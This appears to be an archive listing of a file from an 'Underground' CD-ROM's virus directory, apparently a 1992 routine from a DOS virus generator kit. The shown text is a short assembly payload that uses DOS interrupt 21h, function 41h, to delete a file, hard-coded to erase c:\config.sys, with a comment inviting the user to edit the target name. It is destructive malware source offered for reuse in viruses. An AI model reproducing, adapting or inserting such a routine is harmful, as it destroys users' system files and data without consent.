home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Underground
/
Underground CD1.iso
/
virii
/
virgen
/
ivp17
/
Erasef.rtn
< prev
next >
Encoding:
Amiga
Atari
Commodore
DOS
FM Towns/JPY
Macintosh
Macintosh JP
NeXTSTEP
RISC OS/Acorn
UTF-8
Wrap
Text File
|
1992-12-26
|
217 b
|
14 lines
; Erases the file specified.
; Edit the name for the file.
; DX=Location of file name.
mov ah,41h
int 21h
jmp continue
erasethis db 'c:\config.sys',0
continue: